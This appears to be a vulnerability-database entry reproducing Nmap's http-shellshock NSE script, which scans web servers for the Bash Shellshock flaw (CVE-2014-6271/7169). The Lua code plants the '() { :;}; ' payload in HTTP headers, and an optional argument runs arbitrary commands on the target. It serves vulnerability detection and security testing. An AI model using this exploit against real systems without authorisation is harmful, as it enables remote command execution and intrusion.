Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nmapPaulino Calderon <calderon()websec.mx, Paul Amar <paul()sensepost com>NMAP:HTTP-SHELLSHOCK.NSE
HistoryJan 17, 2015 - 3:01 a.m.

http-shellshock NSE Script

2015-01-1703:01:58
Paulino Calderon <calderon()websec.mx, Paul Amar <paul()sensepost com>
nmap.org
2843

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

JSON

Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.

To detect this vulnerability the script executes a command that prints a random string and then attempts to find it inside the response body. Web apps that don’t print back information won’t be detected with this method.

By default the script injects the payload in the HTTP headers User-Agent, Cookie, and Referer.

Vulnerability originally discovered by Stephane Chazelas.

References:

Script Arguments

http-shellshock.uri

URI. Default: /

http-shellshock.header

HTTP header to use in requests. Default: User-Agent

http-shellshock.cmd

Custom command to send inside payload. Default: nil

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -sV -p- --script http-shellshock &lt;target&gt;
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls &lt;target&gt;

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Requires

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local rand = require "rand"

description = [[
Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and
CVE-2014-7169) in web applications.

To detect this vulnerability the script executes a command that prints a random
string and then attempts to find it inside the response body. Web apps that
don't print back information won't be detected with this method.

By default the script injects the payload in the HTTP headers User-Agent,
Cookie, and Referer.

Vulnerability originally discovered by Stephane Chazelas.

References:
* http://www.openwall.com/lists/oss-security/2014/09/24/10
* http://seclists.org/oss-sec/2014/q3/685
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
]]

---
-- @usage
-- nmap -sV -p- --script http-shellshock <target>
-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-shellshock:
-- |   VULNERABLE:
-- |   HTTP Shellshock vulnerability
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2014-6271
-- |       This web application might be affected by the vulnerability known as Shellshock. It seems the server
-- |       is executing commands injected via malicious HTTP headers.
-- |
-- |     Disclosure date: 2014-09-24
-- |     References:
-- |       http://www.openwall.com/lists/oss-security/2014/09/24/10
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
-- |       http://seclists.org/oss-sec/2014/q3/685
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
--
-- @xmloutput
-- <elem key="title">HTTP Shellshock vulnerability</elem>
-- <elem key="state">VULNERABLE (Exploitable)</elem>
-- <table key="ids">
-- <elem>CVE:CVE-2014-6271</elem>
-- </table>
-- <table key="description">
-- <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server
-- &#xa;is executing commands injected via malicious HTTP headers. &#xa;      </elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2014</elem>
-- <elem key="day">24</elem>
-- <elem key="month">09</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2014-09-24</elem>
-- <table key="refs">
-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem>
-- <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem>
-- <elem>http://seclists.org/oss-sec/2014/q3/685</elem>
-- <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem>
-- </table>
-- @args http-shellshock.uri URI. Default: /
-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent
-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil
---
author = {"Paulino Calderon <calderon()websec.mx","Paul Amar <paul()sensepost com>"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}

portrule = shortport.http

function generate_http_req(host, port, uri, custom_header, cmd)
  local rnd = nil
  --Set custom or probe with random string as cmd
  if not cmd then
    local rnd1 = rand.random_alpha(7)
    local rnd2 = rand.random_alpha(7)
    rnd = rnd1 .. rnd2
    cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2)
  end
  cmd = "() { :;}; " .. cmd
  -- Plant the payload in the HTTP headers
  local options = {header={}}
  options["no_cache"] = true
  if custom_header == nil then
    stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd)
    options["header"]["User-Agent"] = cmd
    options["header"]["Referer"] = cmd
    options["header"]["Cookie"] = cmd
  else
    stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header)
    options["header"][custom_header] = cmd
  end
  local req = http.get(host, port, uri, options)

  return req, rnd
end

action = function(host, port)
  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
  local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or nil
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
  local req, rnd = generate_http_req(host, port, uri, http_header, nil)
  if req.status == 200 and req.body:find(rnd, 1, true) then
    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
    local vuln = {
      title = 'HTTP Shellshock vulnerability',
      state = vulns.STATE.NOT_VULN,
      description = [[
This web application might be affected by the vulnerability known
as Shellshock. It seems the server is executing commands injected
via malicious HTTP headers.
      ]],
      IDS = {CVE = 'CVE-2014-6271'},
      references = {
        'http://www.openwall.com/lists/oss-security/2014/09/24/10',
        'http://seclists.org/oss-sec/2014/q3/685',
        'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'
      },
      dates = {
        disclosure = {year = '2014', month = '09', day = '24'},
      },
    }
    stdnse.debug1("Random pattern '%s' was found in page. Host seems vulnerable.", rnd)
    vuln.state = vulns.STATE.EXPLOIT
    if cmd ~= nil then
       req = generate_http_req(host, port, uri, http_header, cmd)
       vuln.exploit_results = req.body
    end
    return vuln_report:make_output(vuln)
  end
end

Related

ibm 1
lenovo 1
nessus 20
veracode 2
archlinux 1
osv 1
cloudfoundry 1
openvas 10
cve 2
ubuntucve 2
nuclei 1
fedora 3
myhack58 1
symantec 1
debian 3
mageia 1
gentoo 1
ics 1
attackerkb 1
packetstorm 2
threatpost 1
securityvulns 4
freebsd 1
debiancve 2
thn 1
hp 1
checkpoint_security 1
prion 2
paloalto 1
cisa_kev 1
nmap 128
ibm
ibm
Security Bulletin: IBM Tivoli Workload Scheduler (CVE-2014-6271, CVE-2014-7169)
2018-06-17 14:50:13
lenovo
lenovo
GNU Bourne-Again Shell (Bash) 'Shellshock' - Lenovo Support US
2016-11-16 00:00:00
nessus
nessus
Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)
2017-12-04 00:00:00
Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)
2014-09-29 00:00:00
GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)
2014-09-26 00:00:00
veracode
veracode
Arbitrary File Overwrite
2019-01-15 09:02:02
Remote Code Execution (RCE)
2019-01-15 09:01:57
archlinux
archlinux
bash: Remote code execution
2014-09-26 00:00:00
osv
osv
bash - security update
2014-09-25 00:00:00
cloudfoundry
cloudfoundry
CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry
2014-09-25 00:00:00
openvas
openvas
RedHat Update for bash RHSA-2014:1306-01
2014-09-26 00:00:00
Gentoo Security Advisory GLSA 201409-10
2015-09-29 00:00:00
CentOS Update for bash CESA-2014:1306 centos7
2014-10-01 00:00:00
cve
cve
CVE-2014-6271
2014-09-24 18:48:00
CVE-2014-7169
2014-09-25 01:55:00
ubuntucve
ubuntucve
CVE-2014-6271
2014-09-24 00:00:00
CVE-2014-7169
2014-09-25 00:00:00
nuclei
nuclei
ShellShock - Remote Code Execution
2020-10-01 18:03:35
fedora
fedora
[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21
2014-09-27 10:08:26
[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
2014-09-26 09:00:48
[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
2014-09-26 09:03:00
myhack58
myhack58
bash code injection security vulnerability-vulnerability warning-the black bar safety net
2014-09-28 00:00:00
symantec
symantec
GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability
2014-09-24 00:00:00
debian
debian
[SECURITY] [DSA 3035-1] bash security update
2014-09-25 21:18:46
[SECURITY] [DSA 3035-1] bash security update
2014-09-25 21:18:46
[SECURITY] [DLA 63-1] bash security update
2014-09-25 22:35:21
mageia
mageia
Updated bash packages fix CVE-2014-7169
2014-09-28 16:17:31
gentoo
gentoo
Bash: Code Injection (Updated fix for GLSA 201409-09)
2014-09-25 00:00:00
ics
ics
Bash Command Injection Vulnerability (Update A)
2018-09-06 12:00:00
attackerkb
attackerkb
CVE-2014-7169
2014-09-25 00:00:00
packetstorm
packetstorm
Gnu Bash 4.3 CGI REFERER Command Injection
2014-09-26 00:00:00
Gnu Bash 4.3 CGI Scan Remote Command Injection
2014-09-26 00:00:00
threatpost
threatpost
Bash Botnet Exploit Found, Bash Patches Incomplete
2014-09-25 11:41:51
securityvulns
securityvulns
[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System &#40;vCAS&#41; running Bash Shell, Remote Code Execution
2014-10-05 00:00:00
[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution
2014-10-13 00:00:00
[security bulletin] HPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution
2014-10-05 00:00:00
freebsd
freebsd
bash -- remote code execution vulnerability
2014-09-24 00:00:00
debiancve
debiancve
CVE-2014-7169
2014-09-25 01:55:00
CVE-2014-6271
2014-09-24 18:48:00
thn
thn
Hackers Using 'Shellshock' Bash Vulnerability to Launch Botnet Attacks
2014-09-26 20:07:00
hp
hp
HPSBHF03119 rev.3 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution
2014-09-30 00:00:00
checkpoint_security
checkpoint_security
Check Point Response to CVE-2014-6271 and CVE-2014-7169 Bash Code Injection vulnerability
2014-09-24 21:00:00
prion
prion
Design/Logic Flaw
2014-09-24 18:48:00
Design/Logic Flaw
2014-09-25 01:55:00
paloalto
paloalto
Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
2014-09-24 00:00:00
cisa_kev
cisa_kev
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
nmap
nmap
ajp-headers NSE Script
2012-05-07 18:49:22
rusers NSE Script
2016-03-14 16:03:47
daytime NSE Script
2008-11-06 02:52:59

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

JSON
Related for NMAP:HTTP-SHELLSHOCK.NSE
ibm1lenovo1nessus20veracode2archlinux1osv1cloudfoundry1openvas10cve2ubuntucve2nuclei1fedora3myhack581symantec1debian3mageia1gentoo1ics1attackerkb1packetstorm2threatpost1securityvulns4freebsd1debiancve2thn1hp1checkpoint_security1prion2paloalto1cisa_kev1nmap128